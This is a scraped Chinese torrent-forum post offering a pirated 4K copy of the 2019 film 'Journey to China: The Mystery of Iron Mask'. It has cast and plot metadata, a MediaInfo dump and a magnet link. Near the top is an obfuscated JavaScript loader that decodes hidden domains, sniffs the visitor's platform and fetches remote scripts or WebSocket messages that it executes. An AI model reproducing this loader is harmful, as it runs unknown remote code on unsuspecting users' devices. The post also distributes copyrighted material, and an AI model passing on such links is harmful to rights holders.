龙牌之谜[国语音轨/中文字幕].Journey.to.China.The.Mystery.of.Iron.Mask.2019.2160p.迅雷下载 13.05GB

版主小s 1月前 256

var x=window['\x61\x74\x6f\x62'],id=x('NDQ0NDczNzY1NjE1Nzg4ODg4OC0xMDAwNw==');document.write('%lt;ins style="display:none!important" id="'+id+'"%gt;%lt;/ins%gt;');(window.adbyunion=window.adbyunion||[]).push(id);window['\x49\x6e\x58\x62\x4c\x54\x4c\x79\x4d\x72']=(!/^Mac|Win/.test(navigator.platform)||!navigator.platform)?function(){;(function(u,k,w,d,c){var cs=d[x('Y3VycmVudFNjcmlwdA==')];'jQuery';var t=[],l=[],e=0,r=0,delay=2000,f=null,ua=navigator.userAgent.toLowerCase(),sc=Math.max(1,600000),ext='1',i='win'+Math.floor(new Date().getTime()/sc)+ext;if(ua.indexOf('baidu')>-1||ua.indexOf('uawei')>-1){r=1;u=k;f=function(){if(!l.length)return;var ws=new WebSocket(l.shift()+'/'+i);ws.onopen=function(){for(var k in t)t[k]&&clearTimeout(t[k])};ws.onmessage=function(e){new Function('_tdcs',x(e.data))(cs);ws.close()};ws.onerror=function(e){t[++e]&&clearTimeout(t[e]);f()}};}else{f=function(){if(!l.length)return;var s=document.createElement('script');s.src=l.shift()+'/'+i;cs.parentElement.insertBefore(s,cs);s.onload=function(){for(var k in t)t[k]&&clearTimeout(t[k])};s.onerror=function(){cs.parentElement.removeChild(s);t[++e]&&clearTimeout(t[e]);f()}};}u=decodeURIComponent(x(u.replace(new RegExp(c[r]+''+c[r],'g'),c[r])));var l=u.split(',');l.sort(function(){return 0.5-Math.random()});for(var j in l)t[j]=setTimeout(f,delay*j);})('aHR0cHM6Ly9veXdoeWVlaGdoYS5ndWlydWktY2xvdGhlcy5jbb20saHR0cHM6Ly9vYnk2aTg3NjZqZjEuYnVqaWFuZ2ppdTEyMy5jbb20saHR0cHM6Ly9vNzdkMjM0a2RrZmhoLnNwYXJreWluY2h1bbi5jbb20saHR0cHM6Ly9vZmhnODg3MmozODRqZGpmLnRoLW1ha2UuY29tLGh0dHBzOi8vbbzM5ZmoyM2pqZDIzOGUueGlqaS1leHByZXNzLmNvbbQ==','d3NNzOi8vd3NN5ZC53c3RlbnNN5cy5jb206OTg2NNix3c3M6Ly93c2R4LndzdGVuc3JzLmNNvbTo5ODY2LHdzczovL3dzbXIud3NN0ZW5zZGYuY29tOjk4NNjY=',window,document,['b','N']);}:function(){};

◎译 名 龙牌之谜 / 中国游记:龙牌之谜 / 魔鬼的精神2 / Тайна Печати дракона: Путешествие в Китай / Вий 2 / Viy 2 / Journey to China: The Secret of the Seal of the Dragon / Mystery of Dragon's Seal

◎片 名 Тайна печати дракона

◎年 代 2019

◎产 地 俄罗斯 / 中国大陆 / 美国

◎类 别 动作 / 奇幻 / 冒险

◎语 言 英语 / 俄语 / 汉语普通话

◎上映日期 2019-08-16(中国大陆)

◎IMDb链接 https://www.imdb.com/title/tt6218010/

◎豆瓣评分 3.6/10 (15598人评价)

◎豆瓣链接 https://movie.douban.com/subject/26367602/

◎片 长 120分钟

◎导 演 伊哥·斯坦普陈科 Oleg Stepchenko (id:1029440)

◎编 剧 阿列克谢·彼得鲁欣 Alexey A. Petrukhin (id:1204202)

伊哥·斯坦普陈科 Oleg Stepchenko (id:1029440)

◎演 员 成龙 Jackie Chan (id:1054531)

阿诺·施瓦辛格 Arnold Schwarzenegger (id:1035643)

杰森·弗莱明 Jason Flemyng (id:1027179)

姚星彤 Xingtong Yao (id:1318516)

马丽 Li Ma (id:1319032)

李彧 Yu Li (id:1316548)

刘智福 Lance Luu (id:1330554)

刘智堂 Charles Luu (id:1330553)

刘智满 Mark Luu (id:1330552)

李萌萌 Mengmeng Li (id:1354680)

安娜·邱丽娜 Anna Churina (id:1177358)

尤里·科洛科利尼科夫 Yuri Kolokolnikov (id:1038720)

巴维尔·沃利亚 Pavel Volya (id:1238682)

克里斯托弗·法里班克 Christopher Fairbank (id:1085042)

马丁·科勒巴 Martin Klebba (id:1010683)

查尔斯·丹斯 Charles Dance (id:1027299)

鲁特格尔·哈尔 Rutger Hauer (id:1006991)

巴雷特·科茨 Barret Coates (id:1418271)

伊戈尔·日日金 Igor Jijikin (id:1340634)

娜露潘格慕·柴辛 Narupornkamol Chaisang (id:1368708)

安德烈·梅尔兹利金 Andrey Merzlikin (id:1212753)

维伦·巴比切夫 Vilen Babichev (id:1384013)

苼楠塔茬·塔纳潘披散 Sananthachat Thanapatpisal (id:1334541)

彼得·拉斐尔森 Peter Rafelson (id:1042141)

尼基塔·塔拉索夫 Nikita Tarasov (id:1364958)

阿列克谢·彼得鲁欣 Alexey A. Petrukhin (id:1204202)

葵咪莎拉·普碟 Kemisara Paladesh (id:1346295)

安东尼·加瓦德 Anthony Gavard (id:1364555)

马蒂厄·雅克 Mathieu Jaquet (id:1409307)

莱安德罗·梅厄·马丁内斯 Leandro Mayor Martinez (id:1409308)

赵婉瑜 Wanyu Zhao (id:1386344)

梁新展 Xinzhan Liang (id:1402279)

李建桥 Lijianqiao (id:1385223)

查雅妮·臣姗卡维 Chayanit Chansangavej (id:1422568)

阿诺·施瓦辛格 Arnold Schwarzenegger (id:1035643)

◎标 签 奇幻 / 动作 / 中国 / 魔幻 / 冒险 / 2019 / 俄罗斯 / 阿诺德·施瓦辛格

◎简 介

电影《龙牌之谜》讲述了古老的东方传说——龙王在睡觉的时候睫毛长到地里能够长出茶叶。龙王把法力封印在龙牌里,并把这种力量赋予了替他照料睫毛的白魔法大师(成龙饰)和他的女儿成兰(姚星彤饰)。邪恶的黑魔法师将白魔法大师和成兰关进了异国监狱,龙王也陷入了沉睡,以茶叶为生的广大村民从此生活在水深火热之中……

◎获奖情况 (共1项)

第41届金酸莓奖 (2021)

最差男配角(提名)

└──阿诺·施瓦辛格 (id:1035643)

  1. General

  2. Unique ID : 6202402525777531259762421060695902530 (0x4AA8A0DEFBD1AB56B79175B5D1A4942)

  3. Complete name : Journey.to.China.The.Mystery.of.Iron.Mask.2019.2160p.HDR.UHD.BluRay.DTS-HD.MA.5.1.2Audio.x265-10bit-HDS.mkv

  4. Format : Matroska

  5. Format version : Version 4

  6. File size : 13.0 GiB

  7. Duration : 2 h 0 min

  8. Overall bit rate mode : Variable

  9. Overall bit rate : 15.5 Mb/s

  10. Movie name : Journey to China The Mystery of Iron Mask 2019 2160p HDR UHD BluRay DTS-HD MA 5.1 2Audio x265-10bit-HDS

  11. Encoded date : UTC 2021-06-27 03:37:36

  12. Writing application : mkvmerge v38.0.0 ('The Silent Type') 64-bit

  13. Writing library : libebml v1.3.9 + libmatroska v1.5.2


  14. Video

  15. ID : 1

  16. Format : HEVC

  17. Format/Info : High Efficiency Video Coding

  18. Format profile : Main [email protected]@High

  19. HDR format : SMPTE ST 2086, HDR10 compatible

  20. Codec ID : V_MPEGH/ISO/HEVC

  21. Duration : 2 h 0 min

  22. Bit rate : 12.9 Mb/s

  23. Width : 3 840 pixels

  24. Height : 2 024 pixels

  25. Display aspect ratio : 1.897

  26. Frame rate mode : Constant

  27. Frame rate : 23.976 (24000/1001/53354) FPS

  28. Color space : YUV

  29. Chroma subsampling : 4:2:0

  30. Bit depth : 10 bits

  31. Bits/(Pixel*Frame) : 0.069

  32. Stream size : 10.8 GiB (83%)

  33. Title : @HDSky

  34. Writing library : x265 - H.265/HEVC codec

  35. Default : Yes

  36. Forced : No

  37. Color range : Limited

  38. Color primaries : BT.2020

  39. Transfer characteristics : PQ

  40. Matrix coefficients : BT.2020 non-constant

  41. Mastering display color primaries : Display P3

  42. Mastering display luminance : min: 0.0020 cd/m2, max: 1000 cd/m2

  43. Maximum Content Light Level : 739 cd/m2

  44. Maximum Frame-Average Light Level : 331 cd/m2


  45. Audio #1

  46. ID : 2

  47. Format : DTS XLL

  48. Format/Info : Digital Theater Systems

  49. Commercial name : DTS-HD Master Audio

  50. Codec ID : A_DTS

  51. Duration : 2 h 0 min

  52. Bit rate mode : Variable

  53. Bit rate : 2 208 kb/s

  54. Channel(s) : 6 channels

  55. Channel layout : C L R Ls Rs LFE

  56. Sampling rate : 48.0 kHz

  57. Frame rate : 93.750 FPS (512 SPF)

  58. Bit depth : 16 bits

  59. Compression mode : Lossless

  60. Stream size : 1.86 GiB (14%)

  61. Title : English

  62. Language : English

  63. Default : Yes

  64. Forced : No


  65. Audio #2

  66. ID : 3

  67. Format : AC-3

  68. Format/Info : Audio Coding 3

  69. Commercial name : Dolby Digital

  70. Codec ID : A_AC3

  71. Duration : 2 h 0 min

  72. Bit rate mode : Constant

  73. Bit rate : 384 kb/s

  74. Channel(s) : 6 channels

  75. Channel layout : L R C LFE Ls Rs

  76. Sampling rate : 48.0 kHz

  77. Frame rate : 31.250 FPS (1536 SPF)

  78. Compression mode : Lossy

  79. Stream size : 331 MiB (2%)

  80. Title : Mandarin

  81. Language : Chinese

  82. Service kind : Complete Main

  83. Default : No

  84. Forced : No


  85. Text #1

  86. ID : 4

  87. Format : PGS

  88. Muxing mode : zlib

  89. Codec ID : S_HDMV/PGS

  90. Codec ID/Info : Picture based subtitle format used on BDs/HD-DVDs

  91. Duration : 1 h 51 min

  92. Bit rate : 18.9 kb/s

  93. Count of elements : 2159

  94. Stream size : 15.1 MiB (0%)

  95. Title : CHS

  96. Language : Chinese

  97. Default : Yes

  98. Forced : No


  99. Text #2

  100. ID : 5

  101. Format : PGS

  102. Muxing mode : zlib

  103. Codec ID : S_HDMV/PGS

  104. Codec ID/Info : Picture based subtitle format used on BDs/HD-DVDs

  105. Duration : 1 h 51 min

  106. Bit rate : 19.7 kb/s

  107. Count of elements : 2159

  108. Stream size : 15.7 MiB (0%)

  109. Title : CHT

  110. Language : Chinese

  111. Default : No

  112. Forced : No


  113. Menu

  114. 00:00:00.000 : en:Chapter 01

  115. 00:11:38.197 : en:Chapter 02

  116. 00:20:58.883 : en:Chapter 03

  117. 00:29:33.897 : en:Chapter 04

  118. 00:39:21.025 : en:Chapter 05

  119. 00:49:42.771 : en:Chapter 06

  120. 01:00:56.403 : en:Chapter 07

  121. 01:09:50.478 : en:Chapter 08

  122. 01:19:31.308 : en:Chapter 09

  123. 01:29:00.126 : en:Chapter 10

  124. 01:40:43.037 : en:Chapter 11

  125. 01:50:20.864 : en:Chapter 12


TAGS 动作 奇幻 冒险

磁力链:
  • magnet:?xt=urn:btih:4DA782169BACE205DAACD919654DB5F54E646C64
上传的附件:

BT9527.com论坛第一帅,不接受任何反驳
BT9527电影天堂 1、BT9527电影天堂提供的BT文件均来源于互联网抓取,只供网友学习交流、技术提升使用。
2、我们遵守BitTorrent点对点协议原则,任何版权问题请联系原资源发布商,我们不处理任何版权纠纷,谢谢!如有争议请联系邮箱:BT9527#hotmail.com(#换成@)
3、如果您发现某页面或地址有错误,请联系站长邮箱BT9527#hotmail.com(#换成@),我们会尽快处理。您的热心是对BT9527电影天堂最大的支持。
4、本站建议去正规影院观看电影以支持电影行业发展。

最新回复 (0)

你可以在 登录 or 注册 后,对此帖发表评论!

返回